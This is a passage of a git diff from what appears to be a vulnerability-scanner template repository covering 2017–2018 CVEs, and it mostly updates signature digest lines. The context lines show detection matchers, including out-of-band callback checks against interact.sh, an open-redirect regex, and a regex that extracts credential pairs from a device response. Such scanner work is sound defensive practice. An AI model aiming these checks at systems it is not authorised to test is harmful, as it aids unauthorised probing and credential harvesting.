4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100878940581311a5d9587aba613294a182d8de4a03d087fde8f3eb14269d7b253d02206ea04fe2355b669325164543d5b02337f05eccde9b61657d31142cd642735208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 088fe2c837..7725db6fc3 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,4 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2e8be373cdfe4833f47e0738ec1a9f260610f9aaac5a8bcd4511f8ebd39ef7a022074324b0070bd1af8ec301343eee9810571eabec58ee24f22be7a44c8eb05436e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 7b4e5e57d0..e08ffdb597 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -48,4 +48,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092d78e5c2ee601a72fc1005ecee2f4d612d4e1e2ad952794c3c9b11b002f77cb0221008c9d309becc69658e90dcaaa56997b4ddc7bbd5f7964589f4253b715708a4b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 25f3f5218d..665535b2a3 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bfed1bb3dad739a1ef9947e49b189c36f2e6b0b1d6f845ce934981c33f2633302202ba6d95bcd7b94e5cf7c6db6480c3a72fa840646907405d0f5cc57b7dfb6c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 985a6a668c..fd2a9dce04 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204804f37982a6760d4e6547fa3508c53ef48322c15d3d9512e50a4fc96c88ce3f022100fe1c4fa3553083679aad75f77fd4f611edbe82fa0717876a4a5781a654f3a057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index b61c01b8ad..2bc9106fca 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b00287c7a2a6ba526529b8d990b528ce377af16295c124a967356a08b6430f4202206dc31566afe6ca3dfcf7fbc70171e24f3e2c63902bdc59d568de62e08eafb897:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index bc2a7ea770..0dde2a8972 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220496ae546246d7f15d11e64df627664165cfcd3bb66143a4ae5ca128fd250d83e022100846622a1c08d291892cd39ad2e062cdaf36123efb0096ecdb6924824bb274096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024a8d29d33fa8252530cbb7f2948713c26ecce98344c9a9d976f12567408150c022100927252f4dcd48268d836e6b9155ee52daf04b3fcc9fc99e7a554874a57741681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 875939fb07..578a6a829d 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220495b1fa854301eccccabfffc0d5758e79ca9d470d6c9daeed43c960791f9e12d022068e5219d420072a580169f3a2124207ad3774a71cbd02d18543af151bc886452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 823b523c7e..5cef3d8885 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032f11d9b1504fb042b6c91f441deb1a249e941dcbde63ac51f350b05b9e83f71022100875a24db627da0c59bd4743d91b6cca4c08dae7b6fa17d24f1a216284fd2b0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 23e75da196..ac61004431 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200b9e716101bb9f2757f476a63cfce5c17b9dd089a0ba767e03f491ecace39fb6022045455d4187be15412d331dd2b561c4328cdde8acc3c42a3de9f9ceb407376d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220158ca09ea384b1142ffa017940e328ef386bdf182bf063fa9cb058e9a9cb2b57022007c4d73a6544306d7581302f859a7724c44a9660e8374f67d47e3ec98208df3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 1eb505345d..47974bab8f 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096b16c5bc06532125db7042b4a42f48e1284d769136ba0ff69a0b0938ede6d12022100cafa979697e2e675dc8f09112269314d9b7262d802b971342f4a6f336ac9b9d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 607cd654fd..8f03aa5507 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -45,4 +45,4 @@ http: part: header words: - "application/xml" -# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fc20ee39e85f5fe1fee30017bf018dd548bd28468bc79ff6924b19001a637dc022100f9a502ee528a29825061ad581ea1efce6ba69e6cb7f6b655966e2117fb40ded1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 14972a640b..50fabcbed7 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -48,4 +48,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb029caf367f8db0b6350bdbb7b05a9622f3697a1629618e6bd455078d7793ba022100d707398eb77439d4e9261fb482ffd40bd033da6cf31d4178e5e6549d3cc6d8e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 81fc123f6c..8e9d3f09cd 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -45,4 +45,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220337c1a3d26746ee57aa8f2c45501e6031aff3aaeb6755d63a78d80d6bacba95f0220189d68a3a43e09495d3dcee847b6c11e956d2a63eb2ada3ff898d3c6d2a01dc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index de35bb88ae..0f7bc4af52 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0ae3cee6c032779188defaba13ba515900432974163523509b991be8eb3bbe6022044aaab25b4230a8a91fd5f434ae326ca2b94cde43bf07ffffb32b94a7125bb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 892a6db7fc..42a93b198d 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -54,4 +54,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ae1062b4d18e3bae8f1c1d9f3200e04c5d570c18548cb5416cca0a21ff2784d022017b86827595b36926951acc817a2da6dad10db2aeaf57e2bb88093764f8b572b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 51f30bafe7..156f658c9b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058eadfb6c31de91652d2e3f2bbe583e23f200f085f6ce06d3612e9a68a41ba30022041068697a3cca76eacdb62a255ad06cd291e017b9ded3cb927ff3024ff4be806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 32d5c459cc..e14b2a5a9c 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d5e3820e512db011373ede9813749ce666b0b1030e3bafb75a433c8f747058d022100a71caf04a60f079184c23f7c442ca72d1e8642ac385157ab9944830e92448b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220654157dcb293d2d08454e1fb3aefe554654d48c0a62a31599bc162c7336a57d40221009f20fb2092c4f824918490ed55aa5eba154e0c9e2b3eab3ca83ebe97265d8de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 79c018c149..a1ac4bdffd 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -111,4 +111,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220122ca0a4f8e33eeadad533cea05bacbd79424b517cf01d019b6050fa9ab39fec022100c82eae0d2f07bab6718f05e23d1d487229f6ec694b7af767f8f22d19898e4c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 36f50d8c22..58cae6aff8 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009be35f84b58a3b2534536d4717801b75f2f9cec7a15b7a50ddab4fa986660d9e022100f6a7a8f7f29cd485e81d17ed1b9b3fb1ce3f3be143c79087b917bd4abd3c0a57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 8673537ca0..2f6561f1b3 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100becb5b5f455cc2352342a916d40b8b3e767f4bb590ec0663ab0c43a8209036aa02207064fc85e40379fbe38b9715412a026a67a8c3556926dec684adb5320f215f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index aa8a60026f..2ee61183cf 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e232f0baa386a961ae8b970d4e146a2cc11ceb1732f26c2ef20295955e73a350022100baa328e6e710e562eb6cfa8e6f546f7d5da7d2d218cc08f888d389993d3211a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b1c0946541693aca213fa88998f586c3530aee37c8ff6124163eb7cf846ab2f022100d71414aeee0ed44f7cc4620c564f10d312e85bd7fb2e8335d1d804b84c955c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 9eb219e168..796752264f 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d13910ea51e10912ef8a7920f88602a7c375f607fd520c36d87b3e87222226ca02205885520f34c9569d052fafa49195b92d66c1d535316bea0686be5d5a582f3365:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index ae606c2ab8..d3c30ba92a 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206994805bfe4800c98a7123de3e07dd8d4eb8acd1a998e52f4e5f4358b9f56dc502205ed9dfc8fc39f4989d9c2cd237d55365ba24b29b63e822461ec17bb65c97a7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 9467c33124..c3245382d1 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079634a20486dcf525b9d3cb71443762cdac4111b39fe9a6b3449dda9a8e890cc0220445f87f41680fdda13d31abfc6f3e0f0d50d4d2ea8bde289aedb0581313f4c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 6295efc437..30a24812d5 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -56,4 +56,4 @@ http: - '<span class="name">(.*?)</span>' internal: true part: body -# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f81ce3e13f27d57d6da8c69097e3f825ffe0487277515de76774c7a7694b022022100b7b600dafbc5c43e69246a4f582585a5384579f5a124b72709f0d7e74b67413f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index c310e25cba..9f8cdce89d 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1b62b106b4c21342cb736b6e6a4348d2c7b41af9e60f58f06fb0a29d49e4df90221008faeb72dc507eae9f337d9244ac1b75c355da72c479a31bd223d05a0e2e564f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 25fb539b3d..7d3091378f 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d90ae1fac1b0db54f1d7a8e1f3eef2eb844417c05891f1804fb128088eb1d00022066c3f64a9240b442390e30adbf000b7b79f88529a42d94fdc60527fb2e78324a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 0506efb3c4..276a69b40d 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b7546d4dccd4fa181fa09bb83e081a6989aead24521c6c0d70f5248899b2a45022100d4022a0e7bcef44ef127c8b6ff5c4b665921acb82e9765f06abe40226f8969a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 49e2dd760f..0a5d6fdb63 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd38808d0d82c779bd0f9e6a95178a5ba15d9077aea8c861a459efcf42e0a10f022078e07f6c8c953b1fa0e4e74b9571886fce453b537e3a95cd9e23bbcb95b8d798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index c97ede9e94..5aeda05166 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dfe914a909bd06826c5f95c78f072ebc7a003232260c8a72a600053849785ff0220190ab47deef14444724b423984e4a4b3555fda14bdbb101a1f79e98589c2b5f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 21be97774f..80d1969d83 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076907511f4f625fb84a997087590fa36dac01d612d1802c6b579d54c508c623e02203ef2be0b835b4c686a29db3a4afcd4875d69783fc68a917690ddb802c2401758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index 44a4f42524..c9d9f40976 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -39,4 +39,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c92d03da546dfaff637d87978a98fca7e7ad2a8730f1c69d01d1efe4d0a1553022100aa1ee875fe25ce4048f056bec89e298da5b0b1693920c7496c86380672682886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index 54c31f2c3a..40290d66e0 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -40,4 +40,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd7e0f3fb866e6dbe44663017c33c95074875d8b777ee60e7589bdf239c9fda902203633af43f63f2beca4ba88660112dcdba36ad173ba8fcf87ab43b88a71d0f6be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index c2fcae1645..476167d0e2 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -43,4 +43,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f133a4099b185a18cfefaa3ceb1a63edcd4505b939310fbe976681c8e6d0e80022100fdc8e91e5b09fe096ee74cd86983878a072ed1e682531d6b936180afec270de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index 13be4d6826..c8ebb8e65a 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -42,4 +42,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032ff5ae76fd4bafea18400182ea5d3e6b9e5917a60778bb68121d7724dd9a6eb022100cf064e5aaa2db867e5dd696a41135a985be141a222970604ad3f887173ec0db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 33c77bad43..5a5b5ef2e9 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c3b74b5fd566685fbad5b11a5f88f2cbbaeb6a44476e6e1a11c8846c395474c022026262baad879004dfb8e0433aa4206ea581bcd723c00763109d0eba3f5af5e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 